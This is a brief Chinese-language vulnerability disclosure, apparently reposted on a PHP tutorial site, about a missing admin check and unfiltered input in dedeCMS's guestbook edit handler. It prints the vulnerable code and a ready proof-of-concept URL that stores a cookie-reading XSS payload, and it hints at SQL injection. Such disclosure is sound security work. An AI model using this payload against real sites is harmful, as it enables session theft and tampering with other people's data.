来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] dedeCMS某处由于权限绕过可导致跨站脚本攻击首先是/plus/guestbook.phpaction=admin然后来到/guestbook/edit.inc.phpelse if($job==#39;editok#39;)//这里没有判断$g_isadmin{$remsg = trim($remsg);略$dsq......
|
dedeCMS某处由于权限绕过可导致跨站脚本攻击
首先是/plus/guestbook.php  action=admin然后来到/guestbook/edit.inc.php
 else if($job=='editok')//这里没有判断$g_isadmin
{
$remsg = trim($remsg);
略
$dsql->ExecuteNoneQuery("update `detest_guestbook` set `msg`='$msg', `posttime`='".time()."' where id='$id' ");//而这里没有过滤,可以写代码了……
ShowMsg("成功更改或回复一条留言!",$GUEST_BOOK_POS);
exit();
}
http://www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=100&msg=<body onload=alert(document.cookie)> 这个id,可以在[回复/编辑]这个按钮处看到
仔细试试没准还能试出注入呢。。。。
   修复方案:
权限啊,过滤啊,自己看着办吧 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
